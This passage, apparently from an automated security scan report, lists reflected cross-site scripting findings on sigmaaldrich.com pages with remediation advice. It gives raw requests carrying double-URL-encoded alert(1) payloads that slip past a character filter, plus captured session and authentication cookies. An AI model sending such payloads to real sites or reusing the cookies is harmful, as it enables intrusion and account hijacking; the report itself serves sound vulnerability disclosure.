WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:39 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/6cea8";alert(1)//337f97a7b4c","E404") ;
   </script>
...[SNIP]...

1.559. http://www.sigmaaldrich.com/life-science/life-science-services/cloning-transfection.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services/cloning-transfection.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1cd6%2522%253balert%25281%2529%252f%252f57771a356b5 was submitted in the REST URL parameter 1. This input was echoed as f1cd6";alert(1)//57771a356b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencef1cd6%2522%253balert%25281%2529%252f%252f57771a356b5/life-science-services/cloning-transfection.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:43 GMT
Content-Length: 28964
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencef1cd6";alert(1)//57771a356b5/life-science-services/cloning-transfection.html","E404") ;
   </script>
...[SNIP]...

1.560. http://www.sigmaaldrich.com/life-science/life-science-services/cloning-transfection.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services/cloning-transfection.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df0f8%2522%253balert%25281%2529%252f%252f18aa5d384c4 was submitted in the REST URL parameter 2. This input was echoed as df0f8";alert(1)//18aa5d384c4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/life-science-servicesdf0f8%2522%253balert%25281%2529%252f%252f18aa5d384c4/cloning-transfection.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:46 GMT
Content-Length: 28964
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/life-science-servicesdf0f8";alert(1)//18aa5d384c4/cloning-transfection.html","E404") ;
   </script>
...[SNIP]...

1.561. http://www.sigmaaldrich.com/life-science/life-science-services/cloning-transfection.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services/cloning-transfection.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0b78%2522%253balert%25281%2529%252f%252f2e28e64ede0 was submitted in the REST URL parameter 3. This input was echoed as a0b78";alert(1)//2e28e64ede0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/life-science-services/a0b78%2522%253balert%25281%2529%252f%252f2e28e64ede0 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:48 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/life-science-services/a0b78";alert(1)//2e28e64ede0","E404") ;
   </script>
...[SNIP]...

1.562. http://www.sigmaaldrich.com/life-science/life-science-services/mass-spectrometry.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services/mass-spectrometry.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2ee6%2522%253balert%25281%2529%252f%252f2e2c85bc37d was submitted in the REST URL parameter 1. This input was echoed as f2ee6";alert(1)//2e2c85bc37d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencef2ee6%2522%253balert%25281%2529%252f%252f2e2c85bc37d/life-science-services/mass-spectrometry.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:42 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencef2ee6";alert(1)//2e2c85bc37d/life-science-services/mass-spectrometry.html","E404") ;
   </script>
...[SNIP]...

1.563. http://www.sigmaaldrich.com/life-science/life-science-services/mass-spectrometry.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/life-science-services/mass-spectrometry.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1fef4%2522%253balert%25281%2529%252f%252fe974b804620 was submitted in the REST URL parameter 2. This input was echoed as 1fef4";alert(1)//e974b804620 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/life-science-services1fef4%2522%253balert%25281%2529%252f%252fe974b804620/mass-spectrometry.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 